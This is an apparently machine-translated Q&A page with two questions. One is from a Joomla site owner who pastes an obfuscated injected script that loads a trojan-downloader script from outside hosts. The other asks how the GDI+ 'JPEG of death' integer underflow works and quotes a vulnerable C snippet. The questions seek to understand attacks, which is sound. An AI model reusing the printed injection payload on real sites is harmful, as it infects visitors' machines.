Tag: 恶意软件

这个混乱如何工作？

我的Joomla！ 网站已被多次入侵。 有人，不知何故，设法注入下面的垃圾到关键的PHP脚本，但我的意思是不谈论configurationJoomla。 该网站访问量不大（有时我担心我可能是该网站的唯一访问者…），我不关心网站备份和运行。 我会最终处理的。 我的问题是，这个垃圾如何工作？ 我看着它，我只是不知道这是如何做到有害的？ 它试图下载一个名为ChangeLog.pdf的PDF文件，该文件感染了木马，打开后会冻结Acrobat，并在您的机器上造成严重破坏。 它怎么做，我不知道，我不在乎。 但是下面这段脚本是如何调用下载的？ <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!–6f471c20c9b96fed179c85ffdd3365cf–> ESET已将此代码检测为JS / TrojanDownloader.Agent.NRO木马

死亡的JPEG如何运行？

我一直在阅读关于针对Windows XP和Windows Server 2003上的GDI +的老版本攻击，这些攻击称为我正在进行的项目的死亡JPEG。 这个漏洞在下面的链接中得到很好的解释： http : //www.infosecwriters.com/text_resources/pdf/JPEG.pdf 基本上，一个JPEG文件包含一个称为COM的部分，其中包含一个（可能是空的）注释字段和一个包含COM大小的两个字节的值。 如果没有注释，则大小为2.读取器（GDI +）读取大小，减去两个大小，然后分配适当大小的缓冲区以复制堆中的注释。 攻击涉及在该字段中设置值0 。 GDI +减2 ，导致值为-2 (0xFFFe) ，由memcpy转换为无符号整数0XFFFFFFFE 。 示例代码： unsigned int size; size = len – 2; char *comment = (char *)malloc(size + 1); memcpy(comment, src, size); 注意到第三行的malloc(0)应该返回一个指向堆中未分配内存的指针。 如何写0XFFFFFFFE字节（ 4GB !!!!）可能不会崩溃程序？ 这是否超出堆区，并进入其他程序和操作系统的空间？ 那会发生什么？ 正如我所了解的memcpy ，它只是从目的地复制n字符到源。 在这种情况下，源应该在栈上，堆上的目的地， n是4GB 。